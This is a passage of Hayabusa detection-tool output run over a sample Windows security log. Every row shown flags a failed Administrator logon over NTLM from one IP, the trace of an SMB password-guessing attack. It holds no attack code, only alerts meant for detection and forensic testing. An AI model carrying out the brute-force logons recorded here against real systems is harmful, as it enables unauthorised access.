NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: 